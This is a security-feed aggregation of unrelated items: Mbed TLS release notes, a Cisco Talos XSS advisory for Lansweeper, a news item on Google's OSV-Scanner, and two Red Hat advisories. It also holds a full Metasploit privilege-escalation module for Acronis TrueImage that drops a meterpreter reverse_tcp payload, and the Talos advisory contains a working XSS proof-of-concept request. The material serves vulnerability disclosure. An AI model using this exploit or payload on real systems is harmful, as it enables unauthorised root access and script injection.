*   Fix undefined behavior (typically harmless in practice) in PSA ECB  
    encryption and decryption.

**Who should update**

We recommend all users should update to take advantage of the bug fixes contained in this release at an appropriate point in their development lifecycle.

**Checksum**

The SHA256 hashes for the archives are:

bc55232bf71fd66045122ba9050a29ea7cb2e8f99b064a9e6334a82f715881a0 mbedtls-2.28.2.tar.gz  
4e4c4d5fd062dc29160edb916fb969878682221a142bda2be5db40e60125912c mbedtls-2.28.2.zip

CVE-2022-46393: Release Mbed TLS 2.28.2 · Mbed-TLS/mbedtls

Acronis TrueImage versions 2019 update 1 through 2021 update 1 are vulnerable to privilege escalation. The com.acronis.trueimagehelper helper tool does not perform any validation on connecting clients, which gives arbitrary clients the ability to execute functions provided by the helper tool with root privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  include Msf::Post::Common  include Msf::Post::Process  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Acronis TrueImage XPC Privilege Escalation',        'Description' => %q{          Acronis TrueImage versions 2019 update 1 through 2021 update 1          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`          helper tool does not perform any validation on connecting clients,          which gives arbitrary clients the ability to execute functions provided          by the helper tool with `root` privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'Csaba Fitzl', # @theevilbit - Vulnerability Discovery          'Shelby Pace' # Metasploit Module and Objective-c code        ],        'Platform' => [ 'osx' ],        'Arch' => [ ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'CVE', '2020-25736' ],          [ 'URL', 'https://kb.acronis.com/content/68061' ],          [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',          'WfsDelay' => 15        },        'DisclosureDate' => '2020-11-11',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options([      OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),      OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),      OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])    ])  end  def tmp_dir    datastore['WRITABLE_DIR'].to_s  end  def sys_shell    datastore['SHELL'].to_s  end  def compile    datastore['COMPILE']  end  def compile_on_target?    return false if compile == 'False'    if compile == 'Auto'      ret = cmd_exec('xcode-select -p')      return false if ret.include?('error: unable')    end    true  end  def exp_file_name    @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)  end  def check    helper_location = '/Library/PrivilegedHelperTools'    helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]    plist = '/Applications/Acronis True Image.app/Contents/Info.plist'    unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }      return CheckCode::Safe    end    return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)    plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"    build_no = cmd_exec(plutil_cmd)    return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?    build_no = build_no.to_i    vprint_status("Found build #{build_no}")    return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610    CheckCode::Safe('Acronis version found is not vulnerable')  end  def exploit    payload_name = Rex::Text.rand_text_alpha(7)    @payload_path = "#{tmp_dir}/#{payload_name}"    print_status("Attempting to write payload at #{@payload_path}")    unless upload_and_chmodx(@payload_path, generate_payload_exe)      fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')    end    vprint_good("Successfully wrote payload at #{@payload_path}")    @pid = get_valid_pid    exp_bin_path = "#{tmp_dir}/#{exp_file_name}"    if compile_on_target?      exp_src = "#{exp_file_name}.m"      exp_path = "#{tmp_dir}/#{exp_src}"      compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"      unless write_file(exp_path, objective_c_code)        fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')      end      register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)      ret = cmd_exec(compile_cmd)      fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?      print_status("Successfully compiled #{exp_src}...Now executing payload")    else      print_status("Using pre-compiled exploit #{exp_bin_path}")      compiled_exploit = compiled_exp      unless upload_and_chmodx(exp_bin_path, compiled_exploit)        fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')      end      register_files_for_cleanup(exp_bin_path, @payload_path)    end    cmd_exec(exp_bin_path)  end  def objective_c_code    file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')    ERB.new(file_contents).result(binding)  rescue Errno::ENOENT    fail_with(Failure::NotFound, 'ERB payload file not found')  end  def compiled_exp    compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')    compiled.gsub!('/tmp/payload', @payload_path)    compiled.gsub!('/bin/zsh', sys_shell)    compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))    compiled  end  def get_valid_pid    procs = get_processes    return '1' if procs.empty?    len = procs.length    rand_proc = procs[rand(1...len)]    return '1' if rand_proc['pid'].to_s.blank?    rand_proc['pid'].to_s  endend

Acronis TrueImage XPC Privilege Escalation

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-184 - Incomplete Blacklist

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

Lansweeper developers allow users to use certain html tags together with chosen attributes in content added/created by users, e.g. News, Ticket text, etc. To avoid malicious XSS attacks, data which might contain such code is sanitized before being added to the page content. We can see such a sanitization example in the widget responsible for News presentation:

    Line 1 	\App_Web_2mmqsorv\ASP\widgets_helpdesknews_aspx.cs
    Line 2 			
    Line 3 			Dictionary<int, News> dictionary = (from row in NewsController.GetClonedCachedNews().AsEnumerable()
    Line 4 				where row.value.Enabled
    Line 5 				select row).ToDictionary((KeyValuePair<int, News> row) => row.Key, (KeyValuePair<int, News> row) => row.Value);
    Line 6 			if (dictionary.Values.Count > 0)
    Line 7 			{
    Line 8 				__w.Write("\r\n        <div id=\"news\" style=\"overflow: auto; line-height: normal;\">\r\n            <div>\r\n                <table>\r\n                    <tbody>\r\n                        ");
    Line 9 				foreach (News objNews in dictionary.objNewss)
    Line 10				{
    Line 11					__w.Write("\r\n                                <tr>\r\n                                    <td valign=\"top\">\r\n                                        ");
    Line 12					if (objNews.Type != 5)
    Line 13					{
    Line 14						__w.Write("\r\n                                            <img alt=\"\" src=\"");
    Line 15						__w.Write(General.PathPrefix());
    Line 16						__w.Write("images/p");
    Line 17						__w.Write(HttpUtility.HtmlEncode(objNews.Type));
    Line 18						__w.Write(".png\"/>\r\n                                        ");
    Line 19					}
    Line 20					__w.Write("\r\n                                    </td>\r\n                                    <td width=\"100%\">");
    Line 21					__w.Write(HtmlSanitizer.SanitizeHtml(objNews.GetTextTranslation(LS.User.Current().Lang)));
    Line 22					__w.Write("</td>\r\n                                </tr>\r\n                        ");
    Line 23				}
    Line 24				__w.Write("\r\n                    </tbody>\r\n                </table>\r\n            </div>\r\n        </div>  \r\n    ");
    Line 25			}
    

as we can see in line 21 before news text is written to the page content, it’s being sanitized by HtmlSanitizer.SanitizeHtml method. Let us take a look at HtmlSanitizer class implementation:

    Line 1 	LS\Extensions\HtmlSanitizer\HtmlSanitizer.cs
    Line 2 	(...)
    Line 3 			public static HtmlSanitizer CustomHtmlSanitizer()
    Line 4 			{
    Line 5 				HtmlSanitizer htmlSanitizer = new HtmlSanitizer();
    Line 6 				string text = "width height style align valign";
    Line 7 				string[] array = new string[58]
    Line 8 				{
    Line 9 					"h1", "h2", "h3", "h3", "h4", "h5", "h6", "strong", "b", "i",
    Line 10					"em", "thead", "tbody", "tr", "br", "p", "div", "span", "ul", "u",
    Line 11					"pre", "sub", "sup", "strike", "hr", "center", "dl", "dt", "dd", "abbr",
    Line 12					"address", "article", "aside", "bdi", "canvas", "caption", "cite", "code", "col", "colgroup",
    Line 13					"datalist", "dfn", "figcaption", "footer", "header", "kbd", "mark", "nav", "noscript", "picture",
    Line 14					"summary", "s", "samp", "section", "small", "tfoot", "var", "wbr"
    Line 15				};
    Line 16				foreach (string tagName in array)
    Line 17				{
    Line 18					htmlSanitizer.Tag(tagName).AllowAttributes(text);
    Line 19				}
    Line 20				htmlSanitizer.Tag("img").AllowAttributes(text + " src title alt crossorigin ismap longdesc usemap");
    Line 21				htmlSanitizer.Tag("table").AllowAttributes(text + " border cellpadding cellspacing rules sortable summary");
    Line 22				htmlSanitizer.Tag("td").AllowAttributes(text + " colspan rowspan headers");
    Line 23				htmlSanitizer.Tag("ol").AllowAttributes(text + " start reversed type");
    Line 24				htmlSanitizer.Tag("font").AllowAttributes(text + " color face size");
    Line 25				htmlSanitizer.Tag("a").AllowAttributes(text + " href dowload hreflang media media_query rel target type").RemoveEmpty();
    Line 26				htmlSanitizer.Tag("video").AllowAttributes(text + " controls autoplay loop muted poster preload src");
    Line 27				htmlSanitizer.Tag("source").AllowAttributes(text + " src type media");
    Line 28				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 29				htmlSanitizer.Tag("area").AllowAttributes(text + " alt coords download href hreflang media rel shape target type");
    Line 30				htmlSanitizer.Tag("audio").AllowAttributes(text + " autoplay controls loop muted preload src");
    Line 31				htmlSanitizer.Tag("bdo").AllowAttributes(text + " dir");
    Line 32				htmlSanitizer.Tag("blockquote").AllowAttributes(text + " cite");
    Line 33				htmlSanitizer.Tag("button").AllowAttributes(text + " autofocus disabled form formaction formenctype formmethod formnovalidate formtarget name type value");
    Line 34				htmlSanitizer.Tag("del").AllowAttributes(text + " cite datetime");
    Line 35				htmlSanitizer.Tag("ins").AllowAttributes(text + " cite datetime");
    Line 36				htmlSanitizer.Tag("details").AllowAttributes(text + " open");
    Line 37				htmlSanitizer.Tag("dialog").AllowAttributes(text + " open");
    Line 38				htmlSanitizer.Tag("label").AllowAttributes(text + " for");
    Line 39				htmlSanitizer.Tag("li").AllowAttributes(text + " value");
    Line 40				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 41				htmlSanitizer.Tag("menu").AllowAttributes(text + " label type");
    Line 42				htmlSanitizer.Tag("menuitem").AllowAttributes(text + " checked command default disabled icon label type");
    Line 43				htmlSanitizer.Tag("q").AllowAttributes(text + " cite");
    Line 44				htmlSanitizer.Tag("th").AllowAttributes(text + " abbr colspan headers rowspan scope sorted");
    Line 45				htmlSanitizer.Tag("time").AllowAttributes(text + " datetime");
    Line 46				htmlSanitizer.Tag("track").AllowAttributes(text + " default kind label src srclang");
    Line 47				htmlSanitizer.RemoveComments = true;
    Line 48				htmlSanitizer.ForbiddenElements.Add("script");
    Line 49				htmlSanitizer.ForbiddenElements.Add("style");
    Line 50				htmlSanitizer.TransformLinks = true;
    Line 51				return htmlSanitizer;
    Line 52			}
    Line 53
    Line 54			public static string SanitizeHtml(string html, params string[] WhiteList)
    Line 55			{
    Line 56				string text = "";
    Line 57				try
    Line 58				{
    Line 59					text = new SimpleHtmlParser().ParseString(html).OuterXml;
    Line 60				}
    Line 61				catch (Exception ex)
    Line 62				{
    Line 63					ErrorLogging.LogToFile(ex, "Parser error");
    Line 64					text = html;
    Line 65				}
    Line 66				text = CustomHtmlSanitizer().Sanitize(text);
    Line 67				HtmlDocument htmlDocument = new HtmlDocument();
    Line 68				htmlDocument.LoadHtml(text);
    Line 69				SanitizeCss(htmlDocument.DocumentNode);
    Line 70				if (htmlDocument.DocumentNode.ChildNodes.Count == 0 || htmlDocument.DocumentNode.ChildNodes.Count > 1)
    Line 71				{
    Line 72					return "<div style=\"font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;\">" + htmlDocument.DocumentNode.InnerHtml.Trim() + "</div>";
    Line 73				}
    Line 74				return htmlDocument.DocumentNode.InnerHtml.Trim();
    Line 75			}
    Line 76	(...)
    

That’s of course just a part of this class, but we can observe more or less what the assumptions are, etc. This class contains a list of allowed html tags and their attributes the user might use in the text. There are also additional checks for particular attributes (for example, for href where developers check whether it does not start with a schema different than “http/https”). Unfortunately developers allow a tag like button with its attribute formaction and do not sanitize it at all. This gives a potential attacker the possibility to inject malicious javascript code, which will be triggered after the user clicks the button.

**Exploit Proof of Concept**

REQUEST POST /configuration/MainPage/MainPageActions.aspx?action=editnews&id=3 HTTP/1.1 Host: 192.168.0.102:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: _/_ Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 438 Origin: http://192.168.0.102:81 Connection: close Referer: http://192.168.0.102:81/configuration/MainPage/ Cookie: UserSettings=language=1; ASP.NET\_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=;

    __VIEWSTATE=&editnewstext=<button style="width: 500px;height:500px" form="formc" formaction="javascript:alert(1)">click me</button>&newsid=3
    

RESPONSE HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/8.0 x-frame-options: SAMEORIGIN X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 09 Jun 2022 10:15:53 GMT Connection: close Content-Length: 150

    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-32763: TALOS-2022-1541 || Cisco Talos Intelligence Group

Google on Tuesday announced the open source availability of OSV-Scanner, a scanner that aims to offer easy access to vulnerability information about various projects.
The Go-based tool, powered by the Open Source Vulnerabilities (OSV) database, is designed to connect "a project's list of dependencies with the vulnerabilities that affect them," Google software engineer Rex Pan in a post shared

Open Source / Vulnerability Database

Google on Tuesday announced the open source availability of **OSV-Scanner**, a scanner that aims to offer easy access to vulnerability information about various projects.

The Go-based tool, powered by the Open Source Vulnerabilities (OSV) database, is designed to connect "a project's list of dependencies with the vulnerabilities that affect them," Google software engineer Rex Pan in a post shared with The Hacker News.

"The OSV-Scanner generates reliable, high-quality vulnerability information that closes the gap between a developer's list of packages and the information in vulnerability databases," Pan added.

The idea is to identify all the transitive dependencies of a project and highlight relevant vulnerabilities using data pulled from OSV.dev database.

Google further stated that the open source platform supports 16 ecosystems, counting all major languages, Linux distributions (Debian and Alpine), as well as Android, Linux Kernel, and OSS-Fuzz.

The result of this expansion is that OSV.dev is a repository to more than 38,000 advisories, up from 15,000 security alerts a year ago, with Linux (27.4%), Debian (23.2%), PyPI (9.5%), Alpine (7.9%), and npm (7.1%) taking up the top five slots.

As for the next steps, the internet giant noted it's working to incorporate support for C/C++ flaws by building a "high quality database" that involves adding "precise commit level metadata to CVEs."

\\

OSV-Scanner arrives nearly two months after Google launched GUAC – short for Graph for Understanding Artifact Composition – to complement Supply chain Levels for Software Artifacts (SLSA or "salsa") as part of its efforts to harden software supply chain security.

Last week, Google also published a new "Perspectives on Security" report calling on organizations to develop and deploy a common SLSA framework to prevent tampering, improve integrity, and secure packages against potential threats.

Other recommendations laid out by the company include taking on additional open source security responsibilities and adopting a more holistic approach to addressing risks such as those presented by the Log4j vulnerability and the SolarWinds incident in recent years.

"Software supply chain attacks typically require strong technical aptitude and long-term commitment to pull off," the company said. "Sophisticated actors are more likely to have both the intent and capability to conduct these types of attacks."

"Most organizations are vulnerable to software supply chain attacks because attackers take the time to target third-party providers with trusted connections to their customers' networks. They then use that trust to burrow deeper into the networks of their ultimate targets."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Launches Largest Distributed Database of Open Source Vulnerabilities

Red Hat Security Advisory 2022-8941-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:8941-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8941  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.2  
Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time TUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.2.z22 Batch  
(BZ#2138929)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-kvm-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm

Red Hat Enterprise Linux Real Time TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.95.1.rt13.146.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipkNzjgjWX9erEAQjW1Q//R+FZ4vRNbe9sCNyKL5zWmiQk3xwDqmzH  
3JvKzGhiUUNWjTZiIwXKftBKDzXBIqofDjtjHcLBH11R7wIdCY5MB708XOMEylon  
RJHXyZcmbotxn2jw39cd+GRSEy1elw/LGXxbPQEy7rTNAAd7nWfxXuDarf/YShZS  
b//Bl7alg2J71FVKqbZSZek+p2UodjB9pFoUx12B1umcIVAC4GuXhoVKzug6MbDQ  
eoJ5u9wz8NQjFFqSdHMManGxCPB+rKV7X9iDo/5Z3LPGaPNmPWNQet3hWmecwJYo  
LGL8RjlX9S6jm5lRAIl4bGhW3ygZO49s1Kqb9bGSZ9B6NaO3wljNJRJ4R40T7xWa  
mQTQnGyTIEpPDl9oho35ECM79SJ0zJH2/Dk3XITwIYTl1htjAIsPgHJ+tok94U97  
YYj4Z60cc0vpwkCv2yokZN5aa5GxUtjqE2QRkfojKNj6pT724ZwE43Z48OpSn7m6  
uNQ5pZsQtXsH/wc4dNwBNcCy7GxvrYey/AcCmjEedol7ccHJgCcwgqve2UxsV4+3  
xZxbkUuA38Al+7u+XQqJlcRUhO1gJCZ2CmCMn4lYuX2wbCKn2lW2MWJ3aIzizZN+  
XTRoaI1+Wp4SwkcaG7jnzHWurN5uXqpYJRfm6UJyfh1Ea3LfJxbXGTbIDn0I+8wF  
z2E95w0USlk=fqgU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8941-01

Red Hat Security Advisory 2022-8958-01 - The Byte Code Engineering Library is intended to give users a convenient way to analyze, create, and manipulate Java class files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: bcel security update  
Advisory ID:       RHSA-2022:8958-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8958  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-42920  
====================================================================  
1. Summary:

An update for bcel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch  
Red Hat Enterprise Linux Server (v. 7) - noarch  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch  
Red Hat Enterprise Linux Workstation (v. 7) - noarch  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

The Byte Code Engineering Library (Apache Commons BCEL) is intended to give  
users a convenient way to analyze, create, and manipulate (binary) Java  
class files (those ending with .class).

Security Fix(es):

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
bcel-5.2-19.el7_9.src.rpm

noarch:  
bcel-5.2-19.el7_9.noarch.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
bcel-javadoc-5.2-19.el7_9.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipmNzjgjWX9erEAQjriw/+Owsb5KvsFHugafv5z6ZL8f41OHV8MrH9  
d2QfKMQvyMSwXIez5jXSA1O+ft72/pJOmqoavFhMtdIQRfbiSYVq2BGczEW4OCDr  
jw6+ZZ8hHFS8456YlT9c+hs3Ztkbi2B4fZv9s2H6aGSU/S57NjCd+jjG61k7cK6Y  
K8utWZmS5fkY871DTxgcE3aNQ9/8dRVky3B5xW2+kxXQOUGduOPHdmHqT/kQTVDn  
p8ytlqF1IkP8uwK63LaLOMugYwFcevQdLc5looHYLyVius0RdlI07xtK6DG208I2  
yDa1VX/1GdBheDydF5TTH0R2qTRwJGmU523xZCy6EFd5/Z617/qm99saUPcY2c+4  
Q89smDrtC9TyQdth8dnamjGUoLe2FYqOLI08TC0VoVU0AzMs4iD9VOyWAg4gCClh  
p4pkwpTIUlL1qMy8Tw6MT5NpG1hLFirynV0P71PR6+1Ek+7BApFedlhjCt2TNefJ  
fz6gRFQPA/rJbuGexAyth2WoFQr6cQhAr8N1PnuwG6/qFV8En3JzmRXdIbbBBgxF  
rdjFJC7dl+2PEU4g77Y6WeQRUm9naBN5pBYwLChUN2xklLSkuj9KL2jlglmVdQbC  
YAEItBBu8D9q2j9c16fK88+hk82QKmzkdg+IyXCEye1gyS2E15uUfB2gLIOHdeiS  
qG9gWku3dRo=gPn3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#c++